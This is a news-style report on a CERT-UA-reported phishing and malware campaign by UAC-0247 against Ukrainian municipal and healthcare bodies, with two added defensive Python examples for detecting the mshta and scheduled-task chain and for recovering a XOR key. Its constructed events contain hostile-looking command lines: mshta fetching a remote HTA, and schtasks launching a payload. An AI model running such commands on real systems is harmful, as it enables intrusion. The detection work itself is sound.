Surge of Cyberattacks Targeting Local Governments and Healthcare Institutions
In recent weeks, a significant uptick in cyberattacks has been reported against local governments and municipal healthcare institutions, particularly clinical and ambulance hospitals. This alarming trend highlights the persistent threat posed by cybercriminals, who are increasingly focusing their efforts on vital public services that often lack robust cybersecurity defenses.
The latest attacks are attributed to a notorious threat cluster identified as UAC-0247. This group is known for its advanced techniques in data theft, persistence, and lateral movement within networks, raising concerns among cybersecurity experts and government officials alike. The ramifications of these attacks can be severe, endangering sensitive personal data and disrupting essential services.
The Mechanics of the Attack Chain
The attack chain employed by UAC-0247 begins with well-crafted phishing emails that deceptively portray discussions surrounding humanitarian aid proposals. These emails often contain links directing the recipients to malicious web resources. In a troubling trend, threat actors have been known to create entire fake nonprofit websites using artificial intelligence. Furthermore, they sometimes exploit legitimate yet vulnerable sites through cross-site scripting (XSS) vulnerabilities to host malicious code.
Ukraine’s national Computer Emergency Response Team (CERT-UA) has reported a surge in these targeted cyberattacks occurring between March and April 2026. Such sophisticated tactics pose high risks, particularly to organizations that may not have stringent cybersecurity protocols in place.
When victims unwittingly click the phony links in the phishing emails, they unknowingly download an archive file containing a shortcut (.LNK) file. Opening this file triggers the mshta.exe utility, a Windows feature that processes an HTA (HTML Application) script. This script not only retrieves and executes remote content but also displays a decoy form to mislead the user while deploying a malicious executable (.EXE) payload silently through a scheduled task.
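The chain above (shortcut, then mshta.exe fetching an HTA, then a scheduled task launching the EXE) maps onto a few process-creation checks. The following is an added example, not code from CERT-UA's advisory: it runs three rules over constructed Sysmon-style events (the hostnames, PIDs, URL and task name are placeholders, not indicators from the report) and assumes the task is registered through schtasks.exe, which the advisory does not state.

```python
"""Constructed Sysmon-style process-creation events and a small rule set for
the LNK -> mshta.exe -> HTA -> scheduled task chain. Not real telemetry."""
import ntpath

# Constructed events modelled on Sysmon Event ID 1 fields; every value below
# is a placeholder, not an indicator from the CERT-UA report.
EVENTS = [
    {"pid": 4120, "ppid": 1532, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"pid": 5012, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe https://example.invalid/aid-proposal.hta"},
    {"pid": 5044, "ppid": 5012, "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"schtasks.exe /create /sc minute /mo 5 /tn Updater /tr C:\Users\Public\svc.exe"},
    {"pid": 6100, "ppid": 4120, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]

# The utilities the advisory recommends restricting.
RESTRICTED = {"mshta.exe", "powershell.exe", "wscript.exe"}


def base(path):
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def evaluate(events):
    """Return (rule, pid, detail) hits for the chain described in the report."""
    hits = []
    for e in events:
        img, cmd, parent = base(e["image"]), e["cmdline"].lower(), base(e["parent_image"])
        # Rule 1: mshta.exe told to fetch remote content (URL or .hta argument).
        if img == "mshta.exe" and ("http://" in cmd or "https://" in cmd or ".hta" in cmd):
            hits.append(("mshta_remote_hta", e["pid"], cmd))
        # Rule 2: scheduled task created from under a scripting host. Assumes
        # schtasks.exe is used; an HTA registering the task via the Schedule.Service
        # COM object would not produce this child process and needs a task-log rule.
        if img == "schtasks.exe" and "/create" in cmd and parent in RESTRICTED:
            hits.append(("schtasks_from_script_host", e["pid"], f"parent={parent}"))
        # Rule 3: a restricted utility started by explorer.exe, which is what a
        # double-clicked .LNK pointing at mshta.exe looks like in the process tree.
        if img in RESTRICTED and parent == "explorer.exe":
            hits.append(("restricted_util_from_explorer", e["pid"], img))
    return hits


if __name__ == "__main__":
    for hit in evaluate(EVENTS):
        print(hit)
```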
Deployment of Encrypted Reverse Shells
Recent investigations into these incidents have revealed the use of a two-stage loader. The second stage employs a custom executable format capable of supporting custom code sections, dynamic imports, and relocatable code. This design allows the final payload, which is highly compressed and encrypted, to establish a TCP reverse shell known as RAVENSHELL.
Once activated, this reverse shell communicates back to the attackers’ command server, encrypting its traffic using a 9-byte XOR key. The initial communication is often simply an indication of successful connection, quickly followed by an array of commands executed through CMD.
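Because the stream is protected with a short repeating XOR key and opens with a predictable success message, an analyst holding a packet capture can often recover the key from that first message alone. The following is an added example, not code from CERT-UA or the malware: the banner, the 9-byte key and the session bytes are all constructed, since the real values are not in the report.

```python
"""Analyst helper for repeating-key XOR traffic such as the 9-byte key the
report attributes to RAVENSHELL. Assumes the first message is a predictable
connection banner; banner, key and session below are constructed."""


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Apply a repeating-key XOR; the operation is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII or TAB/LF/CR, a sanity score
    for a candidate decryption of command-shell traffic."""
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data) if data else 0.0


def recover_key(ciphertext: bytes, known_prefix: bytes, max_period: int = 32):
    """Return (period, key, score) for the smallest period whose key, derived
    from the first `period` bytes, reproduces the whole known prefix; None if
    no period shorter than the prefix is consistent with it."""
    # A period equal to the prefix length is unverifiable, so stop one short.
    for period in range(1, min(max_period, len(known_prefix) - 1) + 1):
        key = xor_stream(ciphertext[:period], known_prefix[:period])
        # Consistency check: the candidate key must decrypt the entire banner,
        # not just the bytes it was derived from.
        if xor_stream(ciphertext[:len(known_prefix)], key) == known_prefix:
            return period, key, printable_ratio(xor_stream(ciphertext, key))
    return None


# Constructed session: a success banner followed by two CMD exchanges.
BANNER = b"CONNECTED OK\r\n"
PLAINTEXT = BANNER + (b"C:\\Users\\Public>whoami\r\nlab\\operator\r\n"
                      b"C:\\Users\\Public>hostname\r\nWS-CONSTRUCTED\r\n")
KEY = bytes([0x4B, 0x1D, 0x77, 0xA2, 0x09, 0xC3, 0x5E, 0x30, 0xE8])  # constructed
CAPTURE = xor_stream(PLAINTEXT, KEY)  # stands in for a captured TCP payload

if __name__ == "__main__":
    result = recover_key(CAPTURE, BANNER)
    if result:
        period, key, score = result
        print(f"period={period} key={key.hex()} printable={score:.2f}")
        print(xor_stream(CAPTURE, key).decode(errors="replace"))
```

If the banner is shorter than the key, the same check still works with any other known plaintext at a known offset, such as a prompt string the shell echoes back.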
Once the attackers establish a foothold on the victim's system, they deploy a remote administration tool known as AGINGFLY, written in C#. This tool gives the attackers full control over the infected host, including command execution, file transfer, screenshot capture, keylogging, and arbitrary code execution, all over encrypted WebSocket communications.
One of the distinguishing features of AGINGFLY is its dynamic command system. Command handlers are downloaded as source code from the command server and compiled on the host at runtime, which makes the malware harder to detect.
Techniques for Data Theft
For data exfiltration, the attackers use two specialized tools: CHROMELEVATOR and ZAPIXDESK. CHROMELEVATOR extracts stored browser credentials and cookies, while ZAPIXDESK harvests WhatsApp data from the desktop application. Analysis of compromised systems has shown that the attackers use both custom subnet scanners and public tools such as RUSTSCAN for reconnaissance and lateral movement.
In alarming scenarios, investigators discovered an XMRIG cryptocurrency miner stealthily running as a DLL, loaded through a compromised version of the WIREGUARD VPN client. This highlights the escalating creativity and resourcefulness of the attackers.
Recommendations for Mitigation
In light of these attacks, CERT-UA has issued an advisory urging organizations to implement stricter controls over the execution of file types such as LNK, HTA, and JS files. Moreover, it is advisable to limit the use of scripting and administrative utilities, including mshta.exe, powershell.exe, and wscript.exe. Implementing these measures can significantly reduce vulnerability to the evolving threats associated with the UAC-0247 cluster, a persistent threat actively targeting critical healthcare and government infrastructure across Ukraine.
As cyber threats continue to escalate, it is imperative for local governments and healthcare institutions to bolster their cybersecurity defenses, safeguarding sensitive data and ensuring the continuity of essential services. The need for vigilance and proactive measures has never been more urgent in an increasingly interconnected digital landscape.